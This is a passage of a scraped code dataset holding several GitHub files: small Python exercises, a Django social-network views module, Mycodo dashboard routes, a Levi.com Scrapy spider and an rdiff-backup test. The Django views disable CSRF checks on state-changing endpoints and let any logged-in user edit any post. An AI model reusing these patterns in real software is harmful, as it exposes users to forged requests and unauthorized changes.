\"O\"\n\n\n","repo_name":"aptkim/gpn-tictactoe","sub_path":"kim_adv_tictactoe.py","file_name":"kim_adv_tictactoe.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23378070731","text":"#!/usr/bin/env python3\n\ndef check(seq):\n mark = \"\"\n for c in seq:\n if c == \".\": return \"\"\n elif c != \"T\":\n if mark:\n if c != mark: return \"\"\n else: mark = c\n return mark\n\ndef status(board):\n for i in range(4):\n c = check(board[(4*i):(4*i + 4)])\n if c: return \"{0} won\".format(c)\n\n for i in range(4):\n c = check(board[i::4])\n if c: return \"{0} won\".format(c)\n\n c = check(board[0::5])\n if c: return \"{0} won\".format(c)\n c = check(board[3:13:3])\n if c: return \"{0} won\".format(c)\n if \".\" in board: return \"Game has not completed\"\n return \"Draw\"\n\nfin = open(\"A-large.in\", \"r\")\nfout = open(\"A-large.out\", \"w\")\n\nT = int(fin.readline())\n\nfor t in range(1, T + 1):\n board = \"\"\n for _ in range(4): board += fin.readline().rstrip()\n fout.write(\"Case #{0}: {1}\\n\".format(t, status(board)))\n fin.readline()\n\nfin.close()\nfout.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/1043.py","file_name":"1043.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70004181954","text":"#输入:x = 123\n#输出:321\n\n\ndef reverse(x):\n rev=0\n\n while x !=0:\n\n dight=x%10\n #Python3 的取模运算在 x 为负数时也会返回 [0, 9) 以内的结果,因此这里需要进行特殊判断\n if x<0 and dight >0:\n dight-=10\n x=(x-dight)//10\n rev=rev*10+dight\n\n return rev\n\nprint(reverse(-12))","repo_name":"shujing994/studyProject","sub_path":"整数反转.py","file_name":"整数反转.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43839536836","text":"##Integrantes: JonathanCoronel y Leonardochj\nx = float(input(\"Ingresar la coordenada x: \"))\ny = float(input(\"Ingrese la coordenada y: \"))\n\nif (x >= 0) and (y >= 0):\n cuadrante = \"primer cuadrante\"\nif (x <= 0) and (y >= 0):\n 
cuadrante = \"segundo cuadrante\"\nif (x <= 0) and (y <= 0):\n cuadrante = \"tercer cuadrante\"\nif (x >= 0) and (y <= 0):\n cuadrante = \"cuarto cuadrante\"\n\nprint(\"Esta ubicado en el\", cuadrante)\n","repo_name":"IntroProgramacion-P-Oct21-Feb22/trabajofinal-primer-bim-JonathanCoronel","sub_path":"problema05/sol_python/problema05.py","file_name":"problema05.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5146536428","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nimport json\n\nfrom .models import User, Post, Comment, Follow, Like\n\ndef index(request):\n if (request.user.is_authenticated):\n return render(request, \"network/index.html\")\n else:\n return HttpResponseRedirect(reverse(\"login\"))\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"network/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"network/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"network/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/register.html\")\n\n@csrf_exempt\n@login_required\ndef posts(request):\n page = int(request.GET.get(\"page\"))\n p = Paginator(Post.objects.all()[::-1], 5)\n next_page = p.page(page)\n posts = []\n for i in next_page.object_list:\n posts.append({})\n posts[-1][\"id\"] = i.id\n posts[-1][\"author\"] = i.author.username\n posts[-1][\"content\"] = i.content\n posts[-1][\"created\"] = i.created.strftime(\"%b %#d %Y, %#I:%M %p\")\n posts[-1][\"number_of_likes\"] = Like.objects.filter(post = i).count()\n if (Like.objects.filter(post = i, author = request.user).exists()):\n posts[-1][\"liked\"] = 1\n else:\n posts[-1][\"liked\"] = 0\n print(posts)\n return JsonResponse({\n \"number_of_pages\": p.num_pages,\n \"has_next\": next_page.has_next(),\n \"has_previous\": next_page.has_previous(),\n \"posts\": posts\n })\n\n@csrf_exempt\n@login_required\ndef new_post(request):\n if (request.method != \"POST\"):\n return JsonResponse({\"error\": \"POST request required.\"}, 
status=400)\n    author = request.user\n    content = json.loads(request.body)[\"content\"]\n    Post(author = author, content = content).save()\n    return JsonResponse({\"message\": \"Post created successfully.\"}, status=201)\n\n@csrf_exempt\n@login_required\ndef new_comment(request, post_id):\n    if (request.method != \"POST\"):\n        return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n    author = request.user\n    post = Post.objects.get(pk = post_id)\n    content = json.loads(request.body)[\"content\"]\n    Comment(author = author, content = content, post = post).save()\n    return JsonResponse({\"message\": \"Comment created successfully.\"}, status=201)\n\n@csrf_exempt\n@login_required\ndef like(request, post_id):\n    if (request.method != \"PUT\"):\n        return JsonResponse({\"error\": \"PUT request required.\"}, status=400)\n    author = request.user\n    post = Post.objects.get(pk = post_id)\n    if (Like.objects.filter(author = author, post = post).exists()):\n        Like.objects.get(author = author, post = post).delete()\n    else:\n        Like(author = author, post = post).save()\n    return JsonResponse({\"message\": \"Like toggled successfully.\"}, status=201)\n\n@csrf_exempt\n@login_required\ndef follow(request, username):\n    if (request.method != \"PUT\"):\n        return JsonResponse({\"error\": \"PUT request required.\"}, status=400)\n    user = User.objects.get(username = username)\n    if (Follow.objects.filter(follower = request.user, following = user).exists()):\n        Follow.objects.get(follower = request.user, following = user).delete()\n    else:\n        Follow(follower = request.user, following = user).save()\n    return JsonResponse({\"message\": \"Successful\"}, status=201)\n\n@login_required\ndef user(request, username):\n    user = User.objects.get(username = username)\n    followers = Follow.objects.filter(following = user).count()\n    following = Follow.objects.filter(follower = user).count()\n    if (Follow.objects.filter(follower = request.user, following = user).exists()):\n        flag = \"Following\"\n    else:\n        flag = \"Follow\"\n    return render(request, \"network/user.html\", {\n        \"followers\": followers,\n        \"following\": following,\n        \"username\": username,\n        \"flag\": flag\n    })\n\n@csrf_exempt\n@login_required\ndef user_posts(request, username):\n    user = User.objects.get(username = username)\n    db_posts = Post.objects.filter(author = user)\n    page = int(request.GET.get(\"page\"))\n    p = Paginator(db_posts, 5)\n    next_page = p.page(page)\n    posts = []\n    for i in next_page.object_list:\n        posts.append({})\n        posts[-1][\"id\"] = i.id\n        posts[-1][\"author\"] = i.author.username\n        posts[-1][\"content\"] = i.content\n        posts[-1][\"created\"] = i.created.strftime(\"%b %#d %Y, %#I:%M %p\")\n        posts[-1][\"number_of_likes\"] = Like.objects.filter(post = i).count()\n        if (Like.objects.filter(post = i, author = request.user).exists()):\n            posts[-1][\"liked\"] = 1\n        else:\n            posts[-1][\"liked\"] = 0\n    return JsonResponse({\n        \"number_of_pages\": p.num_pages,\n        \"has_next\": next_page.has_next(),\n        \"has_previous\": next_page.has_previous(),\n        \"posts\": posts\n    })\n    \n@login_required\ndef following(request):\n    return render(request, \"network/following.html\")\n
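# Editor's illustrative aside, not from the original app: the serialization block\n# repeated in posts/user_posts/following_posts could be factored into one helper;\n# serialize_post is a hypothetical name, built only from fields used above.\ndef serialize_post(post, user):\n    liked = Like.objects.filter(post=post, author=user).exists()\n    return {\n        'id': post.id,\n        'author': post.author.username,\n        'content': post.content,\n        'created': post.created.strftime('%b %#d %Y, %#I:%M %p'),\n        'number_of_likes': Like.objects.filter(post=post).count(),\n        'liked': 1 if liked else 0,\n    }\n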
\n@csrf_exempt\n@login_required\ndef following_posts(request):\n    following = Follow.objects.filter(follower = request.user)\n    db_posts = []\n    for follow in following:\n        user = follow.following\n        db_posts += (Post.objects.filter(author = user))\n    print(db_posts)\n    page = int(request.GET.get(\"page\"))\n    p = Paginator(db_posts, 5)\n    next_page = p.page(page)\n    posts = []\n    for i in next_page.object_list:\n        posts.append({})\n        posts[-1][\"id\"] = i.id\n        posts[-1][\"author\"] = i.author.username\n        posts[-1][\"content\"] = i.content\n        posts[-1][\"created\"] = i.created.strftime(\"%b %#d %Y, %#I:%M %p\")\n        posts[-1][\"number_of_likes\"] = Like.objects.filter(post = i).count()\n        if (Like.objects.filter(post = i, author = request.user).exists()):\n            posts[-1][\"liked\"] = 1\n        else:\n            posts[-1][\"liked\"] = 0\n    return JsonResponse({\n        \"number_of_pages\": p.num_pages,\n        \"has_next\": next_page.has_next(),\n        \"has_previous\": next_page.has_previous(),\n        \"posts\": posts\n    })\n\n@csrf_exempt\n@login_required\ndef get_user(request):\n    return JsonResponse({\n        \"username\": request.user.username\n    })\n\n@csrf_exempt\n@login_required\ndef edit_post(request, post_id):\n    post = Post.objects.get(pk = post_id)\n    if (request.method != \"PUT\"):\n        return JsonResponse({\"error\": \"PUT request required.\"}, status=400)\n    content = json.loads(request.body)[\"content\"]\n    post.content = content\n    post.save()\n    return JsonResponse({\"message\": \"Successful\"}, status=201)\n","repo_name":"lukatko/network","sub_path":"react_app/network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"36109084717","text":"# -*- coding: UTF-8 -*-\n# envo1 python3.9\n\"\"\"\n@Author:大王\n@File:file_reader.py\n@CreateTime:2022/4/10 20:16\n\"\"\"\n\n\n\"\"\"Reading files\"\"\"\n# First create a file and write the content we need\n# file = open(\"./pi_digits.txt\", 'w')\n# file.write('3.1415926535\\n 8979323846\\n 2643383279')\n# file.close()\n\n# Read the whole file; with the keyword with there is no need to close the file yourself, Python closes it at the right time\nwith open('pi_digits.txt') as file_object:\n    # Read the file content and assign it to a variable\n    contents = file_object.read()\nprint(contents.rstrip())\n\n# Read line by line\nfile_name = 'pi_digits.txt' # If the file is not in the current folder, a path can be used\nwith open(file_name) as file_object:\n    for line in file_object:\n        print(line.rstrip())\n\n# Create a list containing each line of the file\nwith open(file_name) as file_object:\n    # The readlines() method reads every line from the file and stores them in a list\n    lines = file_object.readlines()\n    print(lines)\n\n# Using the file content\npi_string = ''\nfor line in lines:\n    pi_string += line.strip()\n# File contents are read as strings by default; convert them to use integers or floats\nprint(float(pi_string))\nprint(len(pi_string))\n\n\n# Exercise\nfile_path = './learning_python.txt'\nwith open(file_path) as file_python:\n    file_data = file_python.read()\nprint(file_data)\n\nwith open(file_path) as file_python:\n    for line in file_python:\n        print(line.strip())\n\nwith open(file_path) as file_python:\n    data = file_python.readlines()\n    for line in data:\n        print(line.strip())\n\n# Replace content from the file\nwith open(file_path) as file_python:\n    for line in file_python:\n        contents = line.replace('python', 'C')\n        print(contents.strip())\n\n","repo_name":"SirryZBX/my_learning","sub_path":"section10文件和异常/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"71766693315","text":"# coding=utf-8\n\"\"\"collection of Page endpoints.\"\"\"\nimport logging\nimport os\n\nimport flask_login\nfrom flask import redirect, render_template, request, url_for\nfrom flask.blueprints import Blueprint\nfrom sqlalchemy import and_\n\nfrom mycodo.config import PATH_HTML_USER\nfrom mycodo.databases.models import (PID, Camera, Conditional, Conversion,\n                                     CustomController, Dashboard,\n                                     DeviceMeasurements, Input, Measurement,\n                                     Method, Misc, NoteTags, Output,\n                                     OutputChannel, Trigger, Unit, Widget)\nfrom mycodo.mycodo_flask.extensions 
import db\nfrom mycodo.mycodo_flask.forms import forms_dashboard\nfrom mycodo.mycodo_flask.routes_static import inject_variables\nfrom mycodo.mycodo_flask.utils import utils_dashboard, utils_general\nfrom mycodo.utils.outputs import output_types, parse_output_information\nfrom mycodo.utils.system_pi import (\n add_custom_measurements, add_custom_units, parse_custom_option_values_json,\n parse_custom_option_values_output_channels_json, return_measurement_info)\nfrom mycodo.utils.widgets import parse_widget_information\n\nlogger = logging.getLogger('mycodo.mycodo_flask.routes_dashboard')\n\nblueprint = Blueprint('routes_dashboard',\n __name__,\n static_folder='../static',\n template_folder='../templates')\n\n\n@blueprint.context_processor\n@flask_login.login_required\ndef inject_dictionary():\n return inject_variables()\n\n\n@blueprint.route('/save_dashboard_layout', methods=['POST'])\ndef save_dashboard_layout():\n \"\"\"Save positions and sizes of widgets of a particular dashboard.\"\"\"\n if not utils_general.user_has_permission('edit_controllers'):\n return redirect(url_for('routes_general.home'))\n data = request.get_json()\n keys = ('id', 'x', 'y', 'w', 'h')\n for index, each_widget in enumerate(data):\n if all(k in each_widget for k in keys):\n widget_mod = Widget.query.filter(\n Widget.unique_id == each_widget['id']).first()\n if widget_mod:\n widget_mod.position_x = each_widget['x']\n widget_mod.position_y = each_widget['y']\n widget_mod.width = each_widget['w']\n widget_mod.height = each_widget['h']\n db.session.commit()\n return \"success\"\n\n\n@blueprint.route('/dashboard', methods=('GET', 'POST'))\n@flask_login.login_required\ndef page_dashboard_default():\n \"\"\"Load default dashboard.\"\"\"\n dashboard = Dashboard.query.first()\n return redirect(url_for(\n 'routes_dashboard.page_dashboard', dashboard_id=dashboard.unique_id))\n\n\n@blueprint.route('/dashboard-add', methods=('GET', 'POST'))\n@flask_login.login_required\ndef page_dashboard_add():\n \"\"\"Add a dashboard.\"\"\"\n if not utils_general.user_has_permission('edit_controllers'):\n return redirect(url_for('routes_general.home'))\n dashboard_id = utils_dashboard.dashboard_add()\n return redirect(url_for(\n 'routes_dashboard.page_dashboard', dashboard_id=dashboard_id))\n\n\n@blueprint.route('/dashboard/', methods=('GET', 'POST'))\n@flask_login.login_required\ndef page_dashboard(dashboard_id):\n \"\"\"Generate custom dashboard with various data.\"\"\"\n # Retrieve tables from SQL database\n this_dashboard = Dashboard.query.filter(\n Dashboard.unique_id == dashboard_id).first()\n if not this_dashboard:\n return redirect(url_for('routes_dashboard.page_dashboard_default'))\n\n camera = Camera.query.all()\n conditional = Conditional.query.all()\n function = CustomController.query.all()\n widget = Widget.query.all()\n input_dev = Input.query.all()\n device_measurements = DeviceMeasurements.query.all()\n method = Method.query.all()\n misc = Misc.query.first()\n output = Output.query.all()\n output_channel = OutputChannel.query.all()\n pid = PID.query.all()\n tags = NoteTags.query.all()\n\n # Create form objects\n form_base = forms_dashboard.DashboardBase()\n form_dashboard = forms_dashboard.DashboardConfig()\n\n if request.method == 'POST':\n unmet_dependencies = None\n if not utils_general.user_has_permission('edit_controllers'):\n return redirect(url_for('routes_general.home'))\n\n # Dashboard\n if form_dashboard.dash_modify.data:\n utils_dashboard.dashboard_mod(form_dashboard)\n elif form_dashboard.dash_duplicate.data:\n 
utils_dashboard.dashboard_copy(form_dashboard)\n elif form_dashboard.lock.data:\n utils_dashboard.dashboard_lock(form_dashboard.dashboard_id.data, True)\n elif form_dashboard.unlock.data:\n utils_dashboard.dashboard_lock(form_dashboard.dashboard_id.data, False)\n elif form_dashboard.dash_delete.data:\n utils_dashboard.dashboard_del(form_dashboard)\n return redirect(url_for('routes_dashboard.page_dashboard_default'))\n\n # Widget\n elif form_base.widget_add.data:\n unmet_dependencies = utils_dashboard.widget_add(form_base, request.form)\n elif form_base.widget_mod.data:\n utils_dashboard.widget_mod(form_base, request.form)\n elif form_base.widget_delete.data:\n utils_dashboard.widget_del(form_base)\n\n if unmet_dependencies:\n return redirect(url_for('routes_admin.admin_dependencies',\n device=form_base.widget_type.data))\n\n return redirect(url_for(\n 'routes_dashboard.page_dashboard', dashboard_id=this_dashboard.unique_id))\n\n # Generate all measurement and units used\n dict_measurements = add_custom_measurements(Measurement.query.all())\n dict_units = add_custom_units(Unit.query.all())\n\n # Generate dictionary of each measurement ID with the correct measurement/unit used with it\n dict_measure_measurements = {}\n dict_measure_units = {}\n\n for each_measurement in device_measurements:\n # If the measurement is a PID setpoint, set unit to PID measurement.\n measurement = None\n unit = None\n if each_measurement.measurement_type == 'setpoint':\n setpoint_pid = PID.query.filter(PID.unique_id == each_measurement.device_id).first()\n if setpoint_pid and ',' in setpoint_pid.measurement:\n pid_measurement = setpoint_pid.measurement.split(',')[1]\n setpoint_measurement = DeviceMeasurements.query.filter(\n DeviceMeasurements.unique_id == pid_measurement).first()\n if setpoint_measurement:\n conversion = Conversion.query.filter(\n Conversion.unique_id == setpoint_measurement.conversion_id).first()\n _, unit, measurement = return_measurement_info(setpoint_measurement, conversion)\n else:\n conversion = Conversion.query.filter(\n Conversion.unique_id == each_measurement.conversion_id).first()\n _, unit, measurement = return_measurement_info(each_measurement, conversion)\n if unit:\n dict_measure_measurements[each_measurement.unique_id] = measurement\n dict_measure_units[each_measurement.unique_id] = unit\n\n dict_outputs = parse_output_information()\n dict_widgets = parse_widget_information()\n\n custom_options_values_widgets = parse_custom_option_values_json(\n widget, dict_controller=dict_widgets)\n\n custom_options_values_output_channels = parse_custom_option_values_output_channels_json(\n output_channel, dict_controller=dict_outputs, key_name='custom_channel_options')\n\n widget_types_on_dashboard = []\n custom_widget_variables = {}\n widgets_dash = Widget.query.filter(Widget.dashboard_id == dashboard_id).all()\n for each_dash_widget in widgets_dash:\n # Make list of widget types on this particular dashboard\n if each_dash_widget.graph_type not in widget_types_on_dashboard:\n widget_types_on_dashboard.append(each_dash_widget.graph_type)\n\n # Generate dictionary of returned values from widget modules on this particular dashboard\n if 'generate_page_variables' in dict_widgets[each_dash_widget.graph_type]:\n custom_widget_variables[each_dash_widget.unique_id] = dict_widgets[each_dash_widget.graph_type]['generate_page_variables'](\n each_dash_widget.unique_id, custom_options_values_widgets[each_dash_widget.unique_id])\n\n # generate lists of html files to include in dashboard template\n 
list_html_files_body = {}\n list_html_files_title_bar = {}\n list_html_files_head = {}\n list_html_files_configure_options = {}\n list_html_files_js = {}\n list_html_files_js_ready = {}\n list_html_files_js_ready_end = {}\n\n for each_widget_type in widget_types_on_dashboard:\n file_html_head = \"widget_template_{}_head.html\".format(each_widget_type)\n path_html_head = os.path.join(PATH_HTML_USER, file_html_head)\n if os.path.exists(path_html_head):\n list_html_files_head[each_widget_type] = file_html_head\n\n file_html_title_bar = \"widget_template_{}_title_bar.html\".format(each_widget_type)\n path_html_title_bar = os.path.join(PATH_HTML_USER, file_html_title_bar)\n if os.path.exists(path_html_title_bar):\n list_html_files_title_bar[each_widget_type] = file_html_title_bar\n\n file_html_body = \"widget_template_{}_body.html\".format(each_widget_type)\n path_html_body = os.path.join(PATH_HTML_USER, file_html_body)\n if os.path.exists(path_html_body):\n list_html_files_body[each_widget_type] = file_html_body\n\n file_html_configure_options = \"widget_template_{}_configure_options.html\".format(each_widget_type)\n path_html_configure_options = os.path.join(PATH_HTML_USER, file_html_configure_options)\n if os.path.exists(path_html_configure_options):\n list_html_files_configure_options[each_widget_type] = file_html_configure_options\n\n file_html_js = \"widget_template_{}_js.html\".format(each_widget_type)\n path_html_js = os.path.join(PATH_HTML_USER, file_html_js)\n if os.path.exists(path_html_js):\n list_html_files_js[each_widget_type] = file_html_js\n\n file_html_js_ready = \"widget_template_{}_js_ready.html\".format(each_widget_type)\n path_html_js_ready = os.path.join(PATH_HTML_USER, file_html_js_ready)\n if os.path.exists(path_html_js_ready):\n list_html_files_js_ready[each_widget_type] = file_html_js_ready\n\n file_html_js_ready_end = \"widget_template_{}_js_ready_end.html\".format(each_widget_type)\n path_html_js_ready_end = os.path.join(PATH_HTML_USER, file_html_js_ready_end)\n if os.path.exists(path_html_js_ready_end):\n list_html_files_js_ready_end[each_widget_type] = file_html_js_ready_end\n\n # Retrieve all choices to populate form drop-down menu\n choices_camera = utils_general.choices_id_name(camera)\n choices_function = utils_general.choices_functions(\n function, dict_units, dict_measurements)\n choices_input = utils_general.choices_inputs(\n input_dev, dict_units, dict_measurements)\n choices_method = utils_general.choices_methods(method)\n choices_output = utils_general.choices_outputs(\n output, OutputChannel, dict_outputs, dict_units, dict_measurements)\n choices_output_channels = utils_general.choices_outputs_channels(\n output, output_channel, dict_outputs)\n choices_output_channels_measurements = utils_general.choices_outputs_channels_measurements(\n output, OutputChannel, dict_outputs, dict_units, dict_measurements)\n choices_output_pwm = utils_general.choices_outputs_pwm(\n output, OutputChannel, dict_outputs, dict_units, dict_measurements)\n choices_pid = utils_general.choices_pids(\n pid, dict_units, dict_measurements)\n choices_pid_devices = utils_general.choices_pids_devices(pid)\n choices_tag = utils_general.choices_tags(tags)\n\n device_measurements_dict = {}\n for meas in device_measurements:\n device_measurements_dict[meas.unique_id] = meas\n\n # Get what each measurement uses for a unit\n use_unit = utils_general.use_unit_generate(\n device_measurements, input_dev, output, function)\n\n return render_template('pages/dashboard.html',\n and_=and_,\n 
conditional=conditional,\n custom_options_values_output_channels=custom_options_values_output_channels,\n custom_options_values_widgets=custom_options_values_widgets,\n custom_widget_variables=custom_widget_variables,\n table_conversion=Conversion,\n table_function=CustomController,\n table_widget=Widget,\n table_input=Input,\n table_output=Output,\n table_output_channel=OutputChannel,\n table_pid=PID,\n table_device_measurements=DeviceMeasurements,\n table_camera=Camera,\n table_conditional=Conditional,\n table_trigger=Trigger,\n choices_camera=choices_camera,\n choices_function=choices_function,\n choices_input=choices_input,\n choices_method=choices_method,\n choices_output=choices_output,\n choices_output_channels=choices_output_channels,\n choices_output_channels_measurements=choices_output_channels_measurements,\n choices_output_pwm=choices_output_pwm,\n choices_pid=choices_pid,\n choices_pid_devices=choices_pid_devices,\n choices_tag=choices_tag,\n dashboard_id=this_dashboard.unique_id,\n device_measurements_dict=device_measurements_dict,\n dict_measure_measurements=dict_measure_measurements,\n dict_measure_units=dict_measure_units,\n dict_measurements=dict_measurements,\n dict_outputs=dict_outputs,\n dict_units=dict_units,\n dict_widgets=dict_widgets,\n list_html_files_head=list_html_files_head,\n list_html_files_title_bar=list_html_files_title_bar,\n list_html_files_body=list_html_files_body,\n list_html_files_configure_options=list_html_files_configure_options,\n list_html_files_js=list_html_files_js,\n list_html_files_js_ready=list_html_files_js_ready,\n list_html_files_js_ready_end=list_html_files_js_ready_end,\n camera=camera,\n function=function,\n misc=misc,\n pid=pid,\n output=output,\n output_types=output_types(),\n input=input_dev,\n tags=tags,\n this_dashboard=this_dashboard,\n use_unit=use_unit,\n form_base=form_base,\n form_dashboard=form_dashboard,\n widget=widget)\n","repo_name":"kizniche/Mycodo","sub_path":"mycodo/mycodo_flask/routes_dashboard.py","file_name":"routes_dashboard.py","file_ext":"py","file_size_in_byte":15649,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"} +{"seq_id":"41787704435","text":"from __future__ import absolute_import, division, unicode_literals\n\nimport json\nimport traceback\nimport urlparse\nfrom scrapy.conf import settings\nfrom datetime import datetime\n\nimport re\nfrom product_ranking.br_bazaarvoice_api_script import BuyerReviewsBazaarApi\nfrom product_ranking.items import (BuyerReviews, Price, SiteProductItem)\nfrom product_ranking.spiders import BaseProductsSpider, cond_set_value, FormatterWithDefaults\nfrom product_ranking.utils import is_empty\nfrom scrapy import Request\n\n\nclass LeviProductsSpider(BaseProductsSpider):\n name = 'levi_products'\n country = \"US\"\n locale = \"en_US\"\n allowed_domains = [\"levi.com\", \"www.levi.com\", \"api.bazaarvoice.com\"]\n start_urls = []\n\n SEARCH_URL = \"https://www.levi.com/{country}/{locale}/search/{search_term}\" # TODO: ordering\n\n SWATCHES_URL = \"https://www.levi.com/{country}/{locale}/p/{pid}/swatches\"\n\n per_page = 72\n\n REVIEWS_URL = \"https://api.bazaarvoice.com/data/batch.json?passkey=cahQRLJEuMvjxxJkeF12wrUy3WwLmgCQsS8BPlqmOOOA8&\" \\\n \"apiversion=5.5&displaycode=18056-en_us&resource.q0=products&filter.q0=id%3Aeq%3A{product_id}&stats.q0=\" \\\n \"reviews&filteredstats.q0=reviews&filter_reviews.q0=contentlocale%3Aeq%3Aen_US&filter_reviewcomments.q0=\" \\\n 
\"contentlocale%3Aeq%3Aen_US&resource.q1=reviews&filter.q1=isratingsonly%3Aeq%3Afalse&filter.q1=\" \\\n \"productid%3Aeq%3A181810040&filter.q1=contentlocale%3Aeq%3Aen_US&sort.q1=relevancy%3Aa1&stats.q1=\" \\\n \"reviews&filteredstats.q1=reviews&include.q1=authors%2Cproducts%2Ccomments&filter_reviews.q1=\" \\\n \"contentlocale%3Aeq%3Aen_US&filter_reviewcomments.q1=contentlocale%3Aeq%3Aen_US&filter_comments.q1=\" \\\n \"contentlocale%3Aeq%3Aen_US&limit.q1=8&offset.q1=0&limit_comments.q1=3&callback=BV._internal.dataHandler0\"\n\n handle_httpstatus_list = [404]\n\n def __init__(self, *args, **kwargs):\n self.br = BuyerReviewsBazaarApi(called_class=self)\n\n super(LeviProductsSpider, self).__init__(\n url_formatter=FormatterWithDefaults(\n country=self.country, locale=self.locale),\n site_name=self.allowed_domains[0], *args, **kwargs)\n\n self.user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) ' \\\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 ' \\\n 'Safari/537.36 (Content Analytics)'\n\n settings.overrides['DOWNLOADER_CLIENTCONTEXTFACTORY'] = 'product_ranking.utils.TLSFlexibleContextFactory'\n middlewares = settings.get('DOWNLOADER_MIDDLEWARES')\n middlewares['product_ranking.custom_middlewares.TunnelRetryMiddleware'] = 2\n\n self.ignore_color_variants = kwargs.get('ignore_color_variants', True)\n if self.ignore_color_variants in ('0', False, 'false', 'False'):\n self.ignore_color_variants = False\n else:\n self.ignore_color_variants = True\n settings.overrides['USE_PROXIES'] = True\n\n def _parse_single_product(self, response):\n return self.parse_product(response)\n\n def _get_product_json(self, response):\n try:\n raw_data = re.search(\n r'LSCO.dtos = (.*?)LSCO.findFeatureValues',\n response.body,\n re.DOTALL | re.MULTILINE\n )\n return json.loads(raw_data.group(1))\n except:\n self.log(\"Failed to load main json: {}\".format(traceback.format_exc()))\n\n def _get_json_from_response(self, response):\n try:\n data = re.search(r\"= 201\n\"\"\"\nimport os\nimport unittest\n\nimport commontest as comtst\nimport fileset\nfrom rdiff_backup import Globals\n\n\nclass ActionRemoveTest(unittest.TestCase):\n \"\"\"\n Test that rdiff-backup properly removes increments\n \"\"\"\n\n def setUp(self):\n self.base_dir = os.path.join(comtst.abs_test_dir, b\"action_remove\")\n self.from1_struct = {\n \"from1\": {\"contents\": {\n \"fileChanged\": {\"content\": \"initial\"},\n \"fileOld\": {},\n \"fileUnchanged\": {\"content\": \"unchanged\"},\n }}\n }\n self.from1_path = os.path.join(self.base_dir, b\"from1\")\n self.from2_struct = {\n \"from2\": {\"contents\": {\n \"fileChanged\": {\"content\": \"modified\"},\n \"fileNew\": {},\n \"fileUnchanged\": {\"content\": \"unchanged\"},\n }}\n }\n self.from2_path = os.path.join(self.base_dir, b\"from2\")\n self.from3_struct = {\n \"from3\": {\"contents\": {\n \"fileChanged\": {\"content\": \"modified again\"},\n \"fileNew\": {},\n \"fileUnchanged\": {\"content\": \"unchanged\"},\n }}\n }\n self.from3_path = os.path.join(self.base_dir, b\"from3\")\n self.from4_struct = {\n \"from4\": {\"contents\": {\n \"fileChanged\": {\"content\": \"modified again\"},\n \"fileEvenNewer\": {},\n \"fileUnchanged\": {\"content\": \"unchanged\"},\n }}\n }\n self.from4_path = os.path.join(self.base_dir, b\"from4\")\n fileset.create_fileset(self.base_dir, self.from1_struct)\n fileset.create_fileset(self.base_dir, self.from2_struct)\n fileset.create_fileset(self.base_dir, self.from3_struct)\n fileset.create_fileset(self.base_dir, self.from4_struct)\n 
fileset.remove_fileset(self.base_dir, {\"bak\": {\"type\": \"dir\"}})\n self.bak_path = os.path.join(self.base_dir, b\"bak\")\n self.success = False\n # we backup to the same backup repository at different times\n comtst.rdiff_backup_action(\n True, True, self.from1_path, self.bak_path,\n (\"--api-version\", \"201\", \"--current-time\", \"10000\"),\n b\"backup\", ())\n comtst.rdiff_backup_action(\n True, True, self.from2_path, self.bak_path,\n (\"--api-version\", \"201\", \"--current-time\", \"20000\"),\n b\"backup\", ())\n comtst.rdiff_backup_action(\n True, True, self.from3_path, self.bak_path,\n (\"--api-version\", \"201\", \"--current-time\", \"30000\"),\n b\"backup\", ())\n comtst.rdiff_backup_action(\n True, True, self.from4_path, self.bak_path,\n (\"--api-version\", \"201\", \"--current-time\", \"40000\"),\n b\"backup\", ())\n\n def test_action_removeincsolderthan(self):\n \"\"\"test different ways of removing increments\"\"\"\n # removing multiple increments fails without --force\n self.assertNotEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\"),\n b\"remove\", (\"increments\", \"--older-than\", \"1B\")),\n Globals.RET_CODE_OK)\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--force\"), # now forcing!\n 